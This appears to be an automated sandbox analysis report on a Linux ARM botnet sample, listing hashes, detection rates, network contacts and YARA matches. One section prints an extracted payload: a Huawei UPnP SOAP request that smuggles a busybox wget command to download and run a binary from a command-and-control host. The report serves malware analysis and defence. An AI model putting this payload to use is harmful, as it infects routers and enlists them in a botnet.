Linux Analysis Report
notabotnet.arm6

ID:	679639
Product:	CloudBasic
Start time:	08:00:21
Start date:	06.08.2022
Sample:	notabotnet.arm6
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	15b8885e01b36d260d68f181a8ad234b
SHA1:	ce2cbb334f644c3f906921a84af315ef8bde768a
SHA256:	4d2f8ca7808ac88293ea0bbf579e7dc3d2dbe70971a18701f7d58bf44d4c72a6
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Name	Type	MD5	SHA1	SHA256

AV Detection

Source: notabotnet.arm6	Virustotal: Detection: 50%			Perma Link
Source: notabotnet.arm6	ReversingLabs: Detection: 58%

Networking

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 60.20.44.123
Source: unknown	TCP traffic detected without corresponding DNS query: 60.20.44.123
Source: unknown	TCP traffic detected without corresponding DNS query: 60.20.44.123
Source: unknown	TCP traffic detected without corresponding DNS query: 60.20.44.123
Source: unknown	TCP traffic detected without corresponding DNS query: 60.20.44.123
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 60.20.44.123
Source: unknown	TCP traffic detected without corresponding DNS query: 60.20.44.123
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 173.237.89.123

Source: notabotnet.arm6	String found in binary or memory: http://cnc.fearfulcats.tk/notabotnet/notabotnet.arm7
Source: notabotnet.arm6	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: notabotnet.arm6	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Source: notabotnet.arm6, type: SAMPLE

Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13

Source: 6231.1.00007f067c017000.00007f067c02d000.r-x.sdmp, type: MEMORY

Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample

String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g cnc.fearfulcats.tk -l /tmp/binary -r /notabotnet/notabotnet.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: classification engine

Classification label: mal56.troj.linARM6@0/0@0/0

Malware Analysis System Evasion

Source: /tmp/notabotnet.arm6 (PID: 6231)

Queries kernel information via 'uname':

Jump to behavior

Source: notabotnet.arm6, 6231.1.000055cc8d4a9000.000055cc8d5d7000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: notabotnet.arm6, 6231.1.000055cc8d4a9000.000055cc8d5d7000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: notabotnet.arm6, 6231.1.00007ffe04d4e000.00007ffe04d6f000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: notabotnet.arm6, 6231.1.00007ffe04d4e000.00007ffe04d6f000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: notabotnet.arm6, 6231.1.00007ffe04d4e000.00007ffe04d6f000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/notabotnet.arm6SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/notabotnet.arm6

Stealing of Sensitive Information

Source: Yara match	File source: notabotnet.arm6, type: SAMPLE
Source: Yara match	File source: 6231.1.00007f067c017000.00007f067c02d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: notabotnet.arm6 PID: 6231, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: notabotnet.arm6, type: SAMPLE
Source: Yara match	File source: 6231.1.00007f067c017000.00007f067c02d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: notabotnet.arm6 PID: 6231, type: MEMORYSTR